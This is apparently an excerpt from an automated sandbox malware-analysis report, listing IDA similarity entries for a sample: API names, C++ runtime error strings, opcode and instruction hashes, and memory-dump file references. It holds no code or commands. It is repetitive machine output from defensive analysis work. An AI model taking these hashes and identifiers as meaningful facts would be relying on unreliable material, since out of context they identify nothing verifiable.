                            • String ID: __gnu_cxx::__concurrence_lock_error$basic_string: construction from null is not valid
                            • API String ID: 960536887-1066207237
                            • Opcode ID: 8fae8e5edc58ff08585e2a0ab71878945fb0dcc972e9006aeea232ef27a9f239
                            • Instruction ID: 80cb5fd5dd368668d6e359ff60af1de3349594b0377e3a7188a3c8c63f148165
                            • Opcode Fuzzy Hash: 8fae8e5edc58ff08585e2a0ab71878945fb0dcc972e9006aeea232ef27a9f239
                            • Instruction Fuzzy Hash: 78E0A051E19A9542ED057B16A8200F8A3149F86B80BCC1432DD0D9F7A6DE2CE8568320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: CurrentDebugOutputStringThreadabort
                            • String ID: Error cleaning up spin_keys for thread %lu.
                            • API String ID: 3512971422-1576690263
                            • Opcode ID: 36caa336e7756d0b9cd7a471a4babdcc0201f6139aef619ea2092072363818fd
                            • Instruction ID: c9ad6e58688b901beada10f152bd135f63383d112214ea6bd9f821c8993f9569
                            • Opcode Fuzzy Hash: 36caa336e7756d0b9cd7a471a4babdcc0201f6139aef619ea2092072363818fd
                            • Instruction Fuzzy Hash: C001C972618F8581E710AB11F45839AB7A0FB85788F985135E6C98B768CF7DD048C750
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: freememcpystrlen
                            • String ID:
                            • API String ID: 2208669145-0
                            • Opcode ID: caec4dc30e90e74598adf0335f516f3037ba6f6e879437c236dae98257b174f7
                            • Instruction ID: 3aff656cb31c4dd3b3ae3f26325eab9edf380519564a619568cb5ac00de6328d
                            • Opcode Fuzzy Hash: caec4dc30e90e74598adf0335f516f3037ba6f6e879437c236dae98257b174f7
                            • Instruction Fuzzy Hash: 7A41D622A5DAC249F9657A21D5002FAD291AF41794FDC8630DE5E0F7C4DF2CFC61A260
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: free
                            • String ID:
                            • API String ID: 1294909896-0
                            • Opcode ID: 37cc9b823c6b0c349c1f520e34570d912ec6f1f0e9b233a2a15fe0e629d047bc
                            • Instruction ID: f9e9ca99b9d9d7d15ea08f95105c18758f3dbfcd2c3d9387ffd933e453e66180
                            • Opcode Fuzzy Hash: 37cc9b823c6b0c349c1f520e34570d912ec6f1f0e9b233a2a15fe0e629d047bc
                            • Instruction Fuzzy Hash: 4C317F22A19BC180EA54FF2594553F8A291EF44B94FDC4532CA2E8F69CDF3CB455E260
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$\$basic_string::substr
                            • API String ID: 0-2413375357
                            • Opcode ID: 19bf8993d076c8c0b46d6b12a88ed632dd5fa7b512ca125d7e976581538f7bc4
                            • Instruction ID: efc26a8a35ecde0a82d236db1624aaff37a7224054f0190a3dae3336ff022175
                            • Opcode Fuzzy Hash: 19bf8993d076c8c0b46d6b12a88ed632dd5fa7b512ca125d7e976581538f7bc4
                            • Instruction Fuzzy Hash: 90D1A362618EC681EB60AB15E4103EEE361FF84B84F984532EA8D8B799DF3CE551D350
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3bee3e7a53b7f3ac1df9f9b4f1d89d436c73ab3a70f67629e6e07fbca4653df8
                            • Instruction ID: 677c684fa6265c7936369909e8fd5b7c5fb0b5fb8a9e412da37a3ef31118b04f
                            • Opcode Fuzzy Hash: 3bee3e7a53b7f3ac1df9f9b4f1d89d436c73ab3a70f67629e6e07fbca4653df8
                            • Instruction Fuzzy Hash: 7391B572E187D686E761AE2590093B9AAA1EB05B54F9D8230CE0C1F3D5CF3CF895D760
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: ${lambda$}
                            • API String ID: 0-105588721
                            • Opcode ID: 11f993836786e9934a66426e9c8ca68eb666646f9108c5df21f97363ce3ecbcb
                            • Instruction ID: f04904e5fcb22f404430dbde1fec80db7ee6afbe014dde085288662d447f4044
                            • Opcode Fuzzy Hash: 11f993836786e9934a66426e9c8ca68eb666646f9108c5df21f97363ce3ecbcb
                            • Instruction Fuzzy Hash: DCC16C726087C28AE7559F24D4443E977A1EB05B48F8C8135DE890F79ACF79E8A5E320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: _$b$x
                            • API String ID: 39653677-3075772552
                            • Opcode ID: 410c4afa68ded3888fdce98e6503829e3d5fdaf5669ad2a53f95308441f8ac2e
                            • Instruction ID: eaebea367b22d5864e8848a2bc2c01b4220f1f27fa7792eebc67e09c20f7d387
                            • Opcode Fuzzy Hash: 410c4afa68ded3888fdce98e6503829e3d5fdaf5669ad2a53f95308441f8ac2e
                            • Instruction Fuzzy Hash: 4351C372F09B8686EB54AF29E4421F9A3A5FF04784F995431CA4C87359DF3CF4618360
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: basic_string: construction from null is not valid
                            • API String ID: 0-2991274800
                            • Opcode ID: 704a9e382c53aa9a200d29d2165276140b5a6438fda44af67a288c1faca76ef5
                            • Instruction ID: 3bed8fc31d869b2dae898d1c616aa328c301a142792a77be2843c060d6c2b514
                            • Opcode Fuzzy Hash: 704a9e382c53aa9a200d29d2165276140b5a6438fda44af67a288c1faca76ef5
                            • Instruction Fuzzy Hash: AE518072A08FD185EB21AF26E4401E9A765FB49B94F8C4131EF8D8B749CF2CD551CB20
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlenwcslen
                            • String ID: basic_string: construction from null is not valid
                            • API String ID: 803329031-2991274800
                            • Opcode ID: 957254203e374f3bade1e4d7707b30e440407468e776044b84270873b1aecb4f
                            • Instruction ID: 1c9584d68a4948788fee2a953497a1f9c0a3115c9f69393366ad14bc59ec008d
                            • Opcode Fuzzy Hash: 957254203e374f3bade1e4d7707b30e440407468e776044b84270873b1aecb4f
                            • Instruction Fuzzy Hash: AF418D22A19BC585EE20AF19E4402E8A360FB49BC4B8C4435EE4C8F7A5DF3CE565D320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlenwcslen
                            • String ID: basic_string: construction from null is not valid
                            • API String ID: 803329031-2991274800
                            • Opcode ID: 5fb6aceb3d3a1140c0d55674ade3fc501a4d7653a3c7d45c594047a65c704b5a
                            • Instruction ID: 0e16e30125e27b6084f568fee742223a2bf52291b1047c6f4cd2bc87537e993f
                            • Opcode Fuzzy Hash: 5fb6aceb3d3a1140c0d55674ade3fc501a4d7653a3c7d45c594047a65c704b5a
                            • Instruction Fuzzy Hash: 95418D62A19B8585EE20AF19D8401ECA760FB49BD4B8C0435EE4C8F7A4DF3CE565D720
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID:
                            • String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
                            • API String ID: 0-2669816585
                            • Opcode ID: 43f64f24c819bf7fd8c40d47dae0d503455e9a30d37acbe609f909cae983aa51
                            • Instruction ID: 40279359beee2e9dca47d5e9dd42416b8f3954fa93b601758d903be6a5cfd72e
                            • Opcode Fuzzy Hash: 43f64f24c819bf7fd8c40d47dae0d503455e9a30d37acbe609f909cae983aa51
                            • Instruction Fuzzy Hash: 0A41E362F1AEC681EA10BB2AD4181FDE750BB65FD4F984135DE0D973A9DF2CE5428320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: memcpy
                            • String ID: basic_ios::clear
                            • API String ID: 3510742995-82543608
                            • Opcode ID: b9ba147259558f66ce2d52a3e1ce5f6b414f5ed8da353ca2a0e7ff6eea74107b
                            • Instruction ID: 7fc2a8ee325bcc2324b4d02604f864baca940a7e4b0c73b5a01aa4caa2365d44
                            • Opcode Fuzzy Hash: b9ba147259558f66ce2d52a3e1ce5f6b414f5ed8da353ca2a0e7ff6eea74107b
                            • Instruction Fuzzy Hash: E031E3A2B1AEC691EA61AF2695001F9E790AF05BC4F9C8431DE4C87799DF3CE101C320
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: strlen
                            • String ID: basic_string: construction from null is not valid
                            • API String ID: 39653677-2991274800
                            • Opcode ID: 35561cfe715903bd6436c787edd56485d178a6dc98be9c33cdd29f8a69151f4e
                            • Instruction ID: 890cbb615b23f3982bba7a24bd03a5fcd07b9269c81ee3b80c975dccd06aa3f3
                            • Opcode Fuzzy Hash: 35561cfe715903bd6436c787edd56485d178a6dc98be9c33cdd29f8a69151f4e
                            • Instruction Fuzzy Hash: AE2180A2E5AF5585ED19BB1AA8500EDA310EB45F80BCC0432DE0D5B765DF2DE857C320
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: Byte$CharLeadMultiWide
                            • String ID:
                            • API String ID: 2561704868-0
                            • Opcode ID: 33848c0312a656f2a0c22251734374e1e03775347cb0068ad7adf6e6adacea6d
                            • Instruction ID: a1777b09f67a4eb3eda97afe4d265e41c28944a546c8bf4496e217a9d577d7ac
                            • Opcode Fuzzy Hash: 33848c0312a656f2a0c22251734374e1e03775347cb0068ad7adf6e6adacea6d
                            • Instruction Fuzzy Hash: 6031C072A1C7C187E3609F24A4143A9B6A0FB94784F988171DA988FB98DF3DE455EB10
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: memcpystrlen
                            • String ID: basic_ios::clear$basic_string::_S_construct null not valid
                            • API String ID: 3412268980-3371637893
                            • Opcode ID: 773f8ec41fc6f52df4c1692ec68e264dbbd6adcc20a2fcd6b23503a71f5db28f
                            • Instruction ID: d5294a2d73506c18404c665c9338a1f0eac5cfe1d26680cd33bb023a0a94f35a
                            • Opcode Fuzzy Hash: 773f8ec41fc6f52df4c1692ec68e264dbbd6adcc20a2fcd6b23503a71f5db28f
                            • Instruction Fuzzy Hash: 8A21E262A19EC280EA54BB2AA5451FDE394AB45BC0F8C4175FD5E8B79DEF2CD400C3A0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: setlocale$memcpystrlen
                            • String ID:
                            • API String ID: 4096897932-0
                            • Opcode ID: f1f5bd54c38461129c9c14ab153c0ff40cdcfcc6566ecebacef27458a949d6be
                            • Instruction ID: 2918e095a0c9be657ad8546e96d8b6caad78fd32ffe49310db87f98836f8d38b
                            • Opcode Fuzzy Hash: f1f5bd54c38461129c9c14ab153c0ff40cdcfcc6566ecebacef27458a949d6be
                            • Instruction Fuzzy Hash: 69F08251B2978600FD19BB2719590FD82425F49BC0ACC8075EC0D5F3CADE2CF0424350
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: _errno$_findclosefree
                            • String ID:
                            • API String ID: 1846143796-0
                            • Opcode ID: 5cd88100a855528dbf6fc71cd214cf8d8278d3f0d3587e13402f125ce7c1bbcc
                            • Instruction ID: afe71a13ed63ec1541f09739d6e4a07e8866c30a11b878ea643ee7c51b400c90
                            • Opcode Fuzzy Hash: 5cd88100a855528dbf6fc71cd214cf8d8278d3f0d3587e13402f125ce7c1bbcc
                            • Instruction Fuzzy Hash: 58E03022E1829246E9617E2558112E691408F44774FCD4770DE3C4F2C2DD2C6CA157E0
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: wcslen$memcpystrlen
                            • String ID:
                            • API String ID: 3111578849-0
                            • Opcode ID: 3e13eb9ff5378701ff35ac62cb92dcca55b73d8905621966c195c6389973b3f7
                            • Instruction ID: 1a8d84b2158a68b7af2c463097dfb74ac9ef842d48662456296c53ca2921849d
                            • Opcode Fuzzy Hash: 3e13eb9ff5378701ff35ac62cb92dcca55b73d8905621966c195c6389973b3f7
                            • Instruction Fuzzy Hash: FAF15262719F8685DB50AF69E4401ADE361FB85BE4F880636EE5D877E9DF2CE400C320
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1298335299.00007FF75F8B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F8B0000, based on PE: true
                            • Associated: 00000000.00000002.1298316507.00007FF75F8B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298417016.00007FF75F99A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298436691.00007FF75F99E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298464311.00007FF75F9D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298481504.00007FF75F9D2000.00000008.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1298500276.00007FF75F9D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7ff75f8b0000_sNifdpWiY9.jbxd
                            Similarity
                            • API ID: wcslen$memcpystrlen
